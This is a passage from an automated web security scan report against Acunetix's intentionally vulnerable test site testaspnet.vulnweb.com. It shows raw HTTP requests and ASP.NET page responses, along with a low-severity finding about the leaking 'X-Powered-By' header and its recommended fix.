          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWjL6iDQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+dfic04fJFrwdgOeBd3JBjK63E5g==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        19. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 30454
          
          
          Response body (30454 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgI